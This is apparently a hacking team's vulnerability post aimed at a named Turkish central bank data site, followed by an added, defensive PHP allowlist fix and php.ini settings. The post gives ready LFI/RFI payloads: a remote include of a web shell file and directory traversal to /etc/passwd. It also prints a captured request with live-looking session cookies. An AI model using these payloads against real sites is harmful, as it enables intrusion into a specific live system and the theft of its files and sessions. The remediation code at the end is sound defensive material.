Vulnerability Author : Gaddar
Team : SiyahBayrak
TeamMates : Deadly-Warrior ~ StabilBey ~ Diablo
Vendor HomePage : tcmb.gov.tr
Vuln. URL : https://evds2.tcmb.gov.tr/index.php?/evds/serieMarket

Description;
This vulnerability allows remote code and files to be executed. The site stores legal data. The site's source is PHP and is affected by LFI/RFI.

Payload : index.php?sayfa=
Example : index.php?sayfa=https://target.com/shell.txt

Remote Codes;
index.php
<?php include ('data/$home/.../index.php'); ?>

Payload URL : index.php?data=../../../etc/passwd

PREVIEW;
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: BIGipServerEVDS2_HTTPS_POOL=1913432256.47873.0000; JSESSIONID=C7CA3B3E8343A73D36E9E01A25A7EF92; TS013c5758=015d31d691e014116d0f047d3655d2145c0949f6d903ddb8f7d3cba23d3804da926581ee0c2deb034ed073ab3b5fe39632f1879f7c295ca0b2040dcbf0c2bdccddb4e086d9a3bd63aa0aa6e3c227bca89adcfa9a7f
Host: evds2.tcmb.gov.tr
If-Modified-Since: Fri, 17 Jan 2020 13:02:06 GMT
If-None-Match: W/"105932-1579266126000"
Referer: https://evds2.tcmb.gov.tr/index.php?
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
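A hardened form of the include pattern described above, added here as an example and not taken from the advisory or from the vendor's site. It assumes pages live under a ./pages directory and that the allowed page slugs (hypothetical names) are known in advance; both the remote-URL and the directory-traversal values shown above are rejected before anything reaches include().

```php
<?php
// Hardened page dispatcher (added example; directory and slugs are assumptions).
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
// Allowlist: the only values the "sayfa"/"data" parameters may ever take.
const ALLOWED_PAGES = ['home', 'serieMarket', 'about'];

function resolvePage($requested): ?string
{
    // Non-string (e.g. sayfa[]=x) or unlisted values are refused outright,
    // which covers "https://.../shell.txt" and "../../../etc/passwd".
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base      = realpath(PAGES_DIR);
    $candidate = realpath(PAGES_DIR . '/' . $requested . '.php');
    // Defence in depth: the resolved file must still sit inside PAGES_DIR.
    if ($base === false || $candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

$page = resolvePage($_GET['sayfa'] ?? $_GET['data'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;   // only an allowlisted, on-disk file can reach this point
```

Pair this with allow_url_include=Off (and, where nothing needs it, allow_url_fopen=Off) in php.ini so that a remote URL can never be loaded by include() even if a later code path forgets the allowlist.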